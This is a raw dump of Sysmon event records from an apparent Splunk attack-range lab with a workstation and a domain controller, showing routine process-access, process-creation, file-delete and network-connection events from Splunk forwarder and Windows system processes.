07:54:59.001{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082173Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:59.001{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082172Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:59.001{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082171Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:59.001{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082170Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:59.001{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082169Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:59.001{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082168Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:59.001{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082167Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:59.001{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082166Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:59.001{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082165Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:59.001{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B353-615A-6401-00000000FD01}3644C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082164Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:59.001{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B353-615A-6401-00000000FD01}3644C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082163Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:59.002{2FDD8D40-B353-615A-6401-00000000FD01}3644C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000104275Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:57.115{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49588-false10.0.1.12-8089- 23542300x8000000000000000104274Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:59.062{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CDB0E350962B2C8832C39FE4114F7F1,SHA256=78984689178E52A5DFB14DA012251ABA172A3C2ABDA84E5A1C8CC44A9D6DB807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104273Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:59.062{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B00589E601F2F9B0C5AD15879A13C74A,SHA256=C81BCA0C558BD612B4D6DE5BF379228219521902102B7EF6EC66776437F6935D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104297Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:00.563{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CDB0E350962B2C8832C39FE4114F7F1,SHA256=78984689178E52A5DFB14DA012251ABA172A3C2ABDA84E5A1C8CC44A9D6DB807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104296Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:00.547{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEB2161964C9A8BA084F9CF05129C1A9,SHA256=7E676C93C8C9E76086AAFF76B7DA69460E18E1864BCA8B1C541ADDB3C9DB5245,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082179Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:00.642{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8237C124C7755D22EA3BD739DA9C5F7B,SHA256=F0AE49B7BD0B66A5CB7114A2BFD20643B6579F07D27BA4A3DFEB29C984B350A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104295Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:00.453{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B354-615A-EB01-00000000FC01}2944C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104294Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:00.453{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104293Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:00.453{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104292Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:00.453{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104291Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:00.453{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104290Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:00.453{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B354-615A-EB01-00000000FC01}2944C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104289Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:00.453{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B354-615A-EB01-00000000FC01}2944C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104288Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:00.454{58E9C193-B354-615A-EB01-00000000FC01}2944C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000104287Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:58.271{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49589-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000104286Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:58.271{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49589-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 10341000x8000000000000000104285Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:59.985{58E9C193-B353-615A-EA01-00000000FC01}3388416C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082178Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:00.033{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A004E0C0CBF25DA65B8316D92B537C9,SHA256=70D2648CFBC9CDABE72C83F69F35A8BEF12E3688A1A05DDCB614A93B6B8560EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082177Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:00.033{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF57FB2313EB42416027A592FB3A24B6,SHA256=E839AEE92604109E5CE29A7B36958A52571C4663DC6002A09131DF465E05D10B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104300Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:01.562{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=891F18E1DFC04688E9C02CDAC6F1C580,SHA256=F2CE7ED1A7A06C76DBD37B031FE5E62E9590BBC6A1601B553A2EC4F005DFF6CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082181Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:59.711{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50079-false10.0.1.12-8000- 23542300x800000000000000082180Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:01.642{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program 